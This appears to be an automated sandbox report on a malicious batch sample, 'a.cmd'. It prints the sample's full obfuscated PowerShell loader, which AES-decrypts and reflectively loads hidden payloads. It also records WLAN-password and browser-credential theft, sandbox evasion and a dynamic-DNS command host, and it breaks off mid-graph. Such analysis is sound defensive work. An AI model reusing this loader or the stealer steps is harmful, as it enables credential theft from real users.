Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5109Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4760Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4828Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1722Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6304Thread sleep time: -10145709240540247s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7072Thread sleep count: 4828 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7072Thread sleep count: 1722 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6588Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6324Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: Info.txt.7.drBinary or memory string: VirtualMachine: False
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\a.cmd" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\a.cmd';$LzXa='RUWTCeaUWTCdLUWTCineUWTCsUWTC'.Replace('UWTC', ''),'ChZJGfangZJGfeExZJGftenZJGfsiZJGfonZJGf'.Replace('ZJGf', ''),'CAhKEreaAhKEteDAhKEeAhKEcAhKErypAhKEtorAhKE'.Replace('AhKE', ''),'FroBWNamBBWNaasBWNae6BWNa4SBWNatrBWNaiBWNangBWNa'.Replace('BWNa', ''),'DWncieWncicomWnciprWnciessWnci'.Replace('Wnci', ''),'TrOZMganOZMgsfoOZMgrmOZMgFinOZMgalOZMgBOZMgloOZMgckOZMg'.Replace('OZMg', ''),'EleFTeEmFTeEeFTeEnFTeEtAtFTeE'.Replace('FTeE', ''),'MMLMhainMLMhMoMLMhduMLMhlMLMheMLMh'.Replace('MLMh', ''),'EnWitytWityrWityyPWityoWityintWity'.Replace('Wity', ''),'CopyJeHyTyJeHoyJeH'.Replace('yJeH', ''),'SplVFEiiVFEitVFEi'.Replace('VFEi', ''),'GetHQKMCuHQKMrHQKMreHQKMntPHQKMrocHQKMeHQKMsHQKMsHQKM'.Replace('HQKM', ''),'IhYurnvohYurkehYur'.Replace('hYur', ''),'LoaEJSmdEJSm'.Replace('EJSm', '');powershell -w hidden;function kTjsA($UARpu){$rvnjY=[System.Security.Cryptography.Aes]::Create();$rvnjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;$rvnjY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$rvnjY.Key=[System.Convert]::($LzXa[3])('4RFBdW1/zR2QfqFXFvckJggLRbhWPlZ+NeGOFVeQyfc=');$rvnjY.IV=[System.Convert]::($LzXa[3])('/1MUg0yozSO51Z+kagFGTw==');$LixCy=$rvnjY.($LzXa[2])();$eKenk=$LixCy.($LzXa[5])($UARpu,0,$UARpu.Length);$LixCy.Dispose();$rvnjY.Dispose();$eKenk;}function znPjO($UARpu){$WVzHv=New-Object System.IO.MemoryStream(,$UARpu);$OjCYY=New-Object System.IO.MemoryStream;$vQDXk=New-Object System.IO.Compression.GZipStream($WVzHv,[IO.Compression.CompressionMode]::($LzXa[4]));$vQDXk.($LzXa[9])($OjCYY);$vQDXk.Dispose();$WVzHv.Dispose();$OjCYY.Dispose();$OjCYY.ToArray();}$PzMvs=[System.IO.File]::($LzXa[0])([Console]::Title);$pfOyV=znPjO (kTjsA ([Convert]::($LzXa[3])([System.Linq.Enumerable]::($LzXa[6])($PzMvs, 5).Substring(2))));$eOZhb=znPjO (kTjsA ([Convert]::($LzXa[3])([System.Linq.Enumerable]::($LzXa[6])($PzMvs, 6).Substring(2))));[System.Reflection.Assembly]::($LzXa[13])([byte[]]$eOZhb).($LzXa[8]).($LzXa[12])($null,$null);[System.Reflection.Assembly]::($LzXa[13])([byte[]]$pfOyV).($LzXa[8]).($LzXa[12])($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssidJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profileJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr AllJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssidJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\a.cmd';$lzxa='ruwtceauwtcdluwtcineuwtcsuwtc'.replace('uwtc', ''),'chzjgfangzjgfeexzjgftenzjgfsizjgfonzjgf'.replace('zjgf', ''),'cahkereaahketedahkeeahkecahkerypahketorahke'.replace('ahke', ''),'frobwnambbwnaasbwnae6bwna4sbwnatrbwnaibwnangbwna'.replace('bwna', ''),'dwnciewncicomwnciprwnciesswnci'.replace('wnci', ''),'trozmganozmgsfoozmgrmozmgfinozmgalozmgbozmgloozmgckozmg'.replace('ozmg', ''),'elefteemfteeefteenfteetatftee'.replace('ftee', ''),'mmlmhainmlmhmomlmhdumlmhlmlmhemlmh'.replace('mlmh', ''),'enwitytwityrwityypwityowityintwity'.replace('wity', ''),'copyjehytyjehoyjeh'.replace('yjeh', ''),'splvfeiivfeitvfei'.replace('vfei', ''),'gethqkmcuhqkmrhqkmrehqkmntphqkmrochqkmehqkmshqkmshqkm'.replace('hqkm', ''),'ihyurnvohyurkehyur'.replace('hyur', ''),'loaejsmdejsm'.replace('ejsm', '');powershell -w hidden;function ktjsa($uarpu){$rvnjy=[system.security.cryptography.aes]::create();$rvnjy.mode=[system.security.cryptography.ciphermode]::cbc;$rvnjy.padding=[system.security.cryptography.paddingmode]::pkcs7;$rvnjy.key=[system.convert]::($lzxa[3])('4rfbdw1/zr2qfqfxfvckjgglrbhwplz+negofveqyfc=');$rvnjy.iv=[system.convert]::($lzxa[3])('/1mug0yozso51z+kagfgtw==');$lixcy=$rvnjy.($lzxa[2])();$ekenk=$lixcy.($lzxa[5])($uarpu,0,$uarpu.length);$lixcy.dispose();$rvnjy.dispose();$ekenk;}function znpjo($uarpu){$wvzhv=new-object system.io.memorystream(,$uarpu);$ojcyy=new-object system.io.memorystream;$vqdxk=new-object system.io.compression.gzipstream($wvzhv,[io.compression.compressionmode]::($lzxa[4]));$vqdxk.($lzxa[9])($ojcyy);$vqdxk.dispose();$wvzhv.dispose();$ojcyy.dispose();$ojcyy.toarray();}$pzmvs=[system.io.file]::($lzxa[0])([console]::title);$pfoyv=znpjo (ktjsa ([convert]::($lzxa[3])([system.linq.enumerable]::($lzxa[6])($pzmvs, 5).substring(2))));$eozhb=znpjo (ktjsa ([convert]::($lzxa[3])([system.linq.enumerable]::($lzxa[6])($pzmvs, 6).substring(2))));[system.reflection.assembly]::($lzxa[13])([byte[]]$eozhb).($lzxa[8]).($lzxa[12])($null,$null);[system.reflection.assembly]::($lzxa[13])([byte[]]$pfoyv).($lzxa[8]).($lzxa[12])($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\a.cmd';$lzxa='ruwtceauwtcdluwtcineuwtcsuwtc'.replace('uwtc', ''),'chzjgfangzjgfeexzjgftenzjgfsizjgfonzjgf'.replace('zjgf', ''),'cahkereaahketedahkeeahkecahkerypahketorahke'.replace('ahke', ''),'frobwnambbwnaasbwnae6bwna4sbwnatrbwnaibwnangbwna'.replace('bwna', ''),'dwnciewncicomwnciprwnciesswnci'.replace('wnci', ''),'trozmganozmgsfoozmgrmozmgfinozmgalozmgbozmgloozmgckozmg'.replace('ozmg', ''),'elefteemfteeefteenfteetatftee'.replace('ftee', ''),'mmlmhainmlmhmomlmhdumlmhlmlmhemlmh'.replace('mlmh', ''),'enwitytwityrwityypwityowityintwity'.replace('wity', ''),'copyjehytyjehoyjeh'.replace('yjeh', ''),'splvfeiivfeitvfei'.replace('vfei', ''),'gethqkmcuhqkmrhqkmrehqkmntphqkmrochqkmehqkmshqkmshqkm'.replace('hqkm', ''),'ihyurnvohyurkehyur'.replace('hyur', ''),'loaejsmdejsm'.replace('ejsm', '');powershell -w hidden;function ktjsa($uarpu){$rvnjy=[system.security.cryptography.aes]::create();$rvnjy.mode=[system.security.cryptography.ciphermode]::cbc;$rvnjy.padding=[system.security.cryptography.paddingmode]::pkcs7;$rvnjy.key=[system.convert]::($lzxa[3])('4rfbdw1/zr2qfqfxfvckjgglrbhwplz+negofveqyfc=');$rvnjy.iv=[system.convert]::($lzxa[3])('/1mug0yozso51z+kagfgtw==');$lixcy=$rvnjy.($lzxa[2])();$ekenk=$lixcy.($lzxa[5])($uarpu,0,$uarpu.length);$lixcy.dispose();$rvnjy.dispose();$ekenk;}function znpjo($uarpu){$wvzhv=new-object system.io.memorystream(,$uarpu);$ojcyy=new-object system.io.memorystream;$vqdxk=new-object system.io.compression.gzipstream($wvzhv,[io.compression.compressionmode]::($lzxa[4]));$vqdxk.($lzxa[9])($ojcyy);$vqdxk.dispose();$wvzhv.dispose();$ojcyy.dispose();$ojcyy.toarray();}$pzmvs=[system.io.file]::($lzxa[0])([console]::title);$pfoyv=znpjo (ktjsa ([convert]::($lzxa[3])([system.linq.enumerable]::($lzxa[6])($pzmvs, 5).substring(2))));$eozhb=znpjo (ktjsa ([convert]::($lzxa[3])([system.linq.enumerable]::($lzxa[6])($pzmvs, 6).substring(2))));[system.reflection.assembly]::($lzxa[13])([byte[]]$eozhb).($lzxa[8]).($lzxa[12])($null,$null);[system.reflection.assembly]::($lzxa[13])([byte[]]$pfoyv).($lzxa[8]).($lzxa[12])($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

barindex
Tries to harvest and steal WLAN passwords
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profileJump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
Windows Management Instrumentation		1
DLL Side-Loading		11
Process Injection		1
Masquerading		1
OS Credential Dumping		341
Security Software Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts21
Command and Scripting Interpreter		Boot or Logon Initialization Scripts1
DLL Side-Loading		1
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop Protocol1
Data from Local System		1
Non-Standard Port		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell		Logon Script (Windows)Logon Script (Windows)1
Modify Registry		Security Account Manager251
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook251
Virtualization/Sandbox Evasion		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
Process Injection		LSA Secrets1
System Network Configuration Discovery		SSHKeylogging13
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information		Cached Domain Credentials123
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Obfuscated Files or Information		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431886 Sample: a.cmd Startdate: 25/04/2024 Architecture: WINDOWS Score: 100 51 dcxwq1.duckdns.org 2->51 53 27.58.7.0.in-addr.arpa 2->53 55 3 other IPs or domains 2->55 63 Snort IDS alert for network traffic 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 Antivirus detection for URL or domain 2->67 71 2 other signatures 2->71 10 cmd.exe 1 2->10         started        signatures3 69 Uses dynamic DNS services 51->69 process4 signatures5 81 Obfuscated command line found 10->81 83 Very long command line found 10->83 85 Uses netsh to modify the Windows network and firewall settings 10->85 87 Tries to harvest and steal WLAN passwords 10->87 13 cmd.exe 1 10->13         started        16 conhost.exe 10->16         started        18 cmd.exe 1 10->18         started        process6 signatures7 89 Obfuscated command line found 13->89 91 Very long command line found 13->91 20 powershell.exe 16 74 13->20         started        24 conhost.exe 13->24         started        26 cmd.exe 1 13->26         started        28 cmd.exe 13->28         started        process8 dnsIp9 57 dcxwq1.duckdns.org 91.92.249.117, 3232, 49730, 49737 THEZONEBG Bulgaria 20->57 59 ip-api.com 208.95.112.1, 49739, 80 TUT-ASUS United States 20->59 61 2 other IPs or domains 20->61 73 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 20->73 75 Suspicious powershell command line found 20->75 77 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 20->77 79 2 other signatures 20->79 30 cmd.exe 1 20->30         started        33 cmd.exe 1 20->33         started        35 